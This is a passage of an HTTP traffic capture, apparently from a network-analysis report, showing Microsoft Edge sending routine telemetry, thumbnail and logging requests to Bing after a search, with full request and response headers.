accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-3swtKuhQTRpR2mhio98YrkaRxVTk/7yGdbRe5H4Yhks='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:08:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306897.7f111a9
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_feedback%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_feedback%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306897.7f1127f
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_exit%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22tdd_exit%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:17 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306897.7f11294
GET

https://www.bing.com/th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OBFB.1B096C6DCB92C2B9A732929A92AF5585&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 41572
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306898.7f117e5
GET

https://www.bing.com/th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /th?id=OBFB.1E928B2B86E3D4E8ED1D46B83E667303&pid=Fb&qlt=99&r=0 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 54612
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306898.7f117e6
GET

https://www.bing.com/fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306887192%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221016.4999999979045%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306887195%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222847.5000000034925%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306887195%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306887838%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1733306889198%2C%22Name%22%3A%22RejectAll%22%2C%22FID%22%3A%22Mcp%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=5AD7030C91584719B4F5E41231459495&CID=288EEA9122C96A183944FFDA23616B9B&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.ASBundleLoad%22%2C%22TS%22%3A1733306887192%2C%22Name%22%3A%22AutoSuggestBootstrap%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%221016.4999999979045%22%2C%22T%22%3A%22CI.AutosuggestBootstrapLoaded%22%2C%22TS%22%3A1733306887195%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22LoadTime%22%3A%222847.5000000034925%22%2C%22T%22%3A%22CI.AutosuggestJSBundleLoaded%22%2C%22TS%22%3A1733306887195%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22T%22%3A%22CI.NumGuestFltrNotFound%22%2C%22TS%22%3A1733306887838%2C%22Name%22%3A%22NumGuestsFltrEvent%22%2C%22FID%22%3A%22HotelListing%22%7D%2C%7B%22ID%22%3A%2263245%22%2C%22T%22%3A%22CI.Click%22%2C%22TS%22%3A1733306889198%2C%22Name%22%3A%22RejectAll%22%2C%22FID%22%3A%22Mcp%22%7D%5D HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306898.7f117e7
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1108
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=onjon&cvid=0e0e04224c204a07ae85e85e161201dd&aqs=edge..69i57j0l6.6041j0j4&FORM=ANAB01&PC=U531
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:08:15.2000633+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _Rwho=u=d&ts=2024-12-04
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=3&RB=0&GB=0&RG=200&RP=0
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100816
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3772&DPR=1.0&UTC=0&PV=10.0&EXLTT=1&HV=1733306887&WTS=63868903693
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0

Response

HTTP/2.0 204

access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:08:18 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306898.7f1184e
POST

https://www.bing.com/fd/ls/lsp.aspx?

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx? HTTP/2.0
host: www.bing.com
content-length: 612
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/plain;charset=UTF-8
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: empty
